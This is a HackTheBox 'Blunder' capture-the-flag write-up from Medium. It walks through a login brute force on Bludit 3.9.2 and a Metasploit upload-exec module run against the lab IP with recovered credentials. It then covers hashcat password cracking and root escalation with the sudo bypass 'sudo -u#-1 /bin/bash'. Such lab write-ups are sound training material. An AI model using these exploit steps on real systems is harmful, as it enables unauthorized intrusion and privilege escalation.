HackTheBox — Blunder

Summary

Another linux machine are retired with IP 10.10.10.191

Let’s get start!

Enumeration

Nmap

Just one port is open 80, So nothing interest!

Web Enum

I tried to FUZZ the directory by drib, I found admin/login page

Exploit

When i tried to see page source, I found Bludit version 3.9.2
So i tried to find any cve for this version and i found CVE-2019–16113, CVE-2019–17240 and found python script to start brute force attack Bruteforce

SUCCESS: Password found!
Use fergus:RolandDeschain to login.

We can find first cve exploit in Metasploit

msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set TARGET 0
TARGET => 0
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhost 10.10.10.191
rhost => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set rport 80
rport => 80
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
BLUDITUSER => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
BLUDITPASS => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit

Get user Access

Didn’t find user flag, But I found user credentials in users.php

Now we get pass hash, so need to decrypt, I used hashcat and rockyou.txt word list and get the password: Password120

Now i tried to get hudo access with this credentials

Gain user flag!

Privilege Escalation

After some search about (ALL, !root) /bin/bash
found this link:https://n0w4n.nl/sudo-security-bypass/

So i tried to get root with command: sudo -u#-1 /bin/bash

Gain root flag!

If u learn any thing useful from write up, Respect me on HackTheBox

THX for ur time!

--

--

--

CTFer | Computer Science Student

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Has Your Phone Been Hacked? Here’s How to Tell

Prevention from fraud calls, E-mails, password stealers, etc…..

Network Security Zoning

Portswigger SQLi-Lab 3

Remote — HackTheBox

The eCommerce-ification of Data Privacy

China’s Surveillance & Social Credit system alive & kicking in Berlin…

{UPDATE} Unicornio Limo Fabricante Juga Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Samir

Ahmed Samir

CTFer | Computer Science Student

More from Medium

Throwback — Part 9 — TBSEC-DC01

Shibboleth — HackTheBox

Meow HackTheBox Ctf

Snakecode challenge — Hackthebox Writeup